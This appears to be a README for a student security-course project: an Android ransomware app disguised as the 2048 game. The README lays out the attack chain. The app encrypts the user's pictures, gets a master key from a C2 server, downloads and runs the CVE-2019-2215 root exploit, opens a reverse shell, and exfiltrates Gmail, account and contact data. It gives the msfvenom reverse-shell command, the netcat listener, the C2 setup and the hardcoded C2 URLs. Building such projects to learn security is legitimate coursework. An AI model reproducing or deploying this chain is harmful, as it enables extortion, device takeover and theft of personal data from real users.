This project is solely for educational purposes. This project utilise code from rkshrksh/2048-Game and kangtastic/cve-2019-2215.
This project is part of Singapore Institute of Technology Mobile Security module. The project was done within 6 weeks and the aim of the project was to develop a malicious android application. By doing so, it helped us to learn how security mechanisms are implemented in an Android OS and how we can exercise OWASP Mobile Top 10:2017 M8 - Code Tampering.
The project is proof of concept to showcase a custom written ransomware that utilises AES encryption, weaponising cve-2019-2215, and also exfiltrating data from the infected device.
It is tested on Android 10 and Google Pixel 2 XL.
├── 2048-Game // Android Project Folder
├── 2048-keystore // Test-Keystore
├── cve-2019-2215 // Modified cve-2019-2215
│ └── cve-2019-2215.c
├── dropper_server // Dropper server directory
│ ├── cve-2019-2215 // shells.zip content before zipping
│ ├── dropper_server.py // Dropper server program
│ ├── exfiltrated_data.log
│ ├── masterkeys.txt
│ ├── ncat.exe // Netcat windows binary - for Reverse shell listener
│ ├── requirements.txt
│ ├── shells.zip // shells.zip that is hosted in root of dropper server
│ └── venv
└── test_images // test_images for easy adb push <image.ext> /sdcard/Pictures
- Install, run the application and grant permissions
- Ransomware will AES encrypt all files in /sdcard/Pictures
- Each file will be encrypted with a random generated key
- Keys will be stored in /sdcard/keys.json where each key:value pair is filepath:key
- GET HTTP to C2 server /get_mk to retrieve MasterKey and VictimID in response body
- MasterKey will encrypt keys.json, VictimID will be stored in /sdcard/victimID.txt
- The application will download shells.zip and unzip the contents
- Execute cve-2019-2215 binary from the unzipped contents
- A root shell process will be spawn and will run install.sh from the unzipped contents
- Install.sh will execute rs.elf from the unzipped contents to send a reverse connection to attack server
- The appliation will exfiltrate the device's gmail, user account information, and contacts.
ICT2207-P3-Team2-Demo.mp4
For this test, ensure that the victim phone and the C2 server are in the same subnet (otherwise host C2 in public internet). There are 3 endpoints for the C2 server that can be found in dropper/dropper_server.py:
- /process_command - GET to download shells.zip and run the cve-2019-2215 root exploit
- /get_mk - GET to obtain the victimID:masterkey key-value pair to encrypt /sdcard/keys.json
- /postData - POST exfiltrated gmail, contacts, account information
nc -lvnp 1337 # Ideally this should be the same IP as the dropper server
# Generate rs.elf payload
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf
# Better to run flask on Windows if WSL don't port forward localhost traffic to Windows Host
cd dropper
python3 -m venv venv # Create venv
# Activate venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # Make sure host shell is root/Administrator
# Run C2 server
python3 dropper_server.py # WSL
python dropper_server.py # Windows
shells.zip in /dropper
- Go to dropper/cve-2019-2215 folder
- After creating rs.elf, zip rs.elf + cve-2019-2215, install.sh
- Rename zip file to shells.zip
- Move shells.zip to /dropper
Java Classes
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/process_command"; // Line 19
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Change IP and port according to dropper server IP and port
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45
// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Change IP and port according to dropper server IP and port
String urlString = "http://192.168.157.73:8080/postData"; // Line 32